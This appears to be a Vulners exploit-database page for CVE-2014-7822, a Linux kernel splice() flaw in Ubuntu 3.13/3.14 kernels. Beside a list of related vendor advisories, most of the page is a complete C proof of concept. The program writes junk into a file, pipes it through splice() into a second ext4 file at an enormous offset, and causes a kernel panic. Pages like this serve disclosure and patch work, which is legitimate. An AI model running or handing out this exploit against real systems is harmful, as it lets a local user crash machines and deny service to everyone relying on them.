Vulners
Lucene search
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service
| Reporter | Title | Published | Views | Family All 167 |
|---|---|---|---|---|
 | Security Bulletin: Multiple Kernel vulnerabilities affect PowerKVM (Multiple CVEs) | 18 Jun 201801:28 | – | ibm |
 | Medium: kernel | 11 Feb 201500:00 | – | amazon |
 | Amazon Linux AMI : kernel (ALAS-2015-476) | 13 Feb 201500:00 | – | nessus |
| CentOS 7 : kernel (CESA-2015:0102) | 30 Jan 201500:00 | – | nessus |
| CentOS 5 : kernel (CESA-2015:0164) | 11 Feb 201500:00 | – | nessus |
| CentOS 6 : kernel (CESA-2015:0674) | 13 Mar 201500:00 | – | nessus |
| Debian DLA-155-1 : linux-2.6 security update | 26 Mar 201500:00 | – | nessus |
| Debian DSA-3170-1 : linux - security update | 24 Feb 201500:00 | – | nessus |
| EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1482) | 13 May 201900:00 | – | nessus |
| F5 Networks BIG-IP : Linux kernel vulnerability (SOL17237) | 9 Sep 201500:00 | – | nessus |
10
/* ----------------------------------------------------------------------------------------------------
* cve-2014-7822_poc.c
*
* The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file
* which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call,
* as demonstrated by use of a file descriptor associated with an ext4 filesystem.
*
*
* This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
* Works on ext4 filesystem
* Tested on Ubuntu with 3.13 and 3.14 kernels
*
* Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c
*
*
* Emeric Nasi - www.sevagas.com
*-----------------------------------------------------------------------------------------------------*/
/* ----------------------- Includes ----------------------------*/
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <limits.h>
#define EXPLOIT_NAME "cve-2014-7822"
#define EXPLOIT_TYPE DOS
#define JUNK_SIZE 30000
/* ----------------------- functions ----------------------------*/
/* Useful:
*
+============+===============================+===============================+
| \ File flag| | |
| \ | !EXT4_EXTENTS_FL | EXT4_EXTETNS_FL |
|Fs Features\| | |
+------------+-------------------------------+-------------------------------+
| !extent | write: 2194719883264 | write: -------------- |
| | seek: 2199023251456 | seek: -------------- |
+------------+-------------------------------+-------------------------------+
| extent | write: 4402345721856 | write: 17592186044415 |
| | seek: 17592186044415 | seek: 17592186044415 |
+------------+-------------------------------+-------------------------------+
*/
/**
* Poc for cve_2014_7822 vulnerability
*/
int main()
{
int pipefd[2];
int result;
int in_file;
int out_file;
int zulHandler;
loff_t viciousOffset = 0;
char junk[JUNK_SIZE] ={0};
result = pipe(pipefd);
// Create and clear zug.txt and zul.txt files
system("cat /dev/null > zul.txt");
system("cat /dev/null > zug.txt");
// Fill zul.txt with A
zulHandler = open("zul.txt", O_RDWR);
memset(junk,'A',JUNK_SIZE);
write(zulHandler, junk, JUNK_SIZE);
close(zulHandler);
//put content of zul.txt in pipe
viciousOffset = 0;
in_file = open("zul.txt", O_RDONLY);
result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);
close(in_file);
// Put content of pipe in zug.txt
out_file = open("zug.txt", O_RDWR);
viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!
printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset);
result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615
if (result == -1)
{
printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno));
exit(1);
}
close(out_file);
close(pipefd[0]);
close(pipefd[1]);
//Open zug.txt
in_file = open("zug.txt", O_RDONLY);
close(in_file);
printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n");
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Apr 2015 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 27.2
EPSS0.00381